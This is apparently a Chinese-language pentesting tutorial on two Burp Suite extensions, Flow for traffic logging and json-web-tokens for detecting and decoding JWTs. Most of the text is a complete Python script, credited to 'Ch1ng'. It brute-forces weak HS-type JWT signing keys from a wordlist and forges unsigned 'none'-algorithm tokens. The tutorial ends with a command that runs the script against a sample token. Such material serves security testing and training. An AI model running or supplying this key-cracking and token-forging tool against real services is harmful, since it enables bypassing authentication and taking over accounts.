1.Flow(流量记录)

https://github.com/portswigger/flow
image.png
可以记录下发送的流量,请求包和返回包
image.png

2.json-web-tokens(攻击JWT,伪造签名)

https://github.com/portswigger/json-web-tokens
image.png
若请求包中包含jwt签名编码的,会自动识别
image.png
自动解密
image.png
如果jwt签名使用了弱密钥,则可以进行爆破(前提是HS类型)
爆破脚本
需要安装依赖库py -3 -m pip install pyjwt

  1. import jwt
  2. import json
  3. from optparse import OptionParser
  4. def runblasting(path,jwt_str,alg):
  5. if alg == "none":
  6. alg = "HS256"
  7. with open(path,encoding='utf-8') as f:
  8. for line in f:
  9. key_ = line.strip()
  10. try:
  11. jwt.decode(jwt_str,verify=True,key=key_,algorithm=alg)
  12. print('found key! --> ' + key_)
  13. break
  14. except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
  15. print('found key! --> ' + key_)
  16. break
  17. except(jwt.exceptions.InvalidSignatureError):
  18. continue
  19. else:
  20. print("key not found!")
  21. def generatejwt(dictstring,key='',alg='none'):
  22. jsstr = json.loads(dictstring)
  23. return jwt.encode(jsstr, key=key, algorithm=alg).decode('utf-8')
  24. if __name__ == "__main__":
  25. parser = OptionParser()
  26. parser.add_option("-m", "--mode", action="store", dest="mode", default='',type="string",help="Mode has generate disable encryption and blasting encryption key [generate/blasting]")
  27. parser.add_option("-s", "--string", action="store", dest="jwtstring", default='',type="string",help="Input your JWT string")
  28. parser.add_option("-a", "--algorithm", action="store", dest="algorithm", default='none',type="string",help="Input JWT algorithm default:NONE")
  29. parser.add_option("--kf", "--key-file", action="store", dest="keyfile", type="string", default=False, help="Input your Verify Key File")
  30. (options, args) = parser.parse_args()
  31. if options.mode == "generate":
  32. print(generatejwt(options.jwtstring,alg=options.algorithm))
  33. exit()
  34. if options.mode == "blasting":
  35. runblasting(options.keyfile,options.jwtstring,options.algorithm)
  36. exit()
  37. else:
  38. print(
  39. '''
  40. _____ ____ ____ _________ ______ _______ _ ______ ___ ____
  41. |_ _||_ _| |_ _|| _ _ | .' ___ ||_ __ \ / \ .' ___ ||_ ||_ _|
  42. | | \ \ /\ / / |_/ | | \_|/ .' \_| | |__) | / _ \ / .' \_| | |_/ /
  43. _ | | \ \/ \/ / | | | | | __ / / ___ \ | | | __'.
  44. | |__' | \ /\ / _| |_ \ `.___.'\ _| | \ \_ _/ / \ \_\ `.___.'\ _| | \ \_
  45. `.____.' \/ \/ |_____| `.____ .'|____| |___||____| |____|`.____ .'|____||____|
  46. By:Ch1ng
  47. '''
  48. )
  49. print(parser.format_help())

弱密钥爆破,HS型

  1. py -3 jwtcrack.py -m blasting -s eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1NzYxMjE1NDcsInVzZXJuYW1lIjoiemRqIiwicGFzc3dvcmQiOiIxMjMifQ.mkCLR5Kje9x-z8hRgWBMxnQm8hknOwV1Zd8uSZa3rQY --kf
  2. top6000.txt

image.png
image.png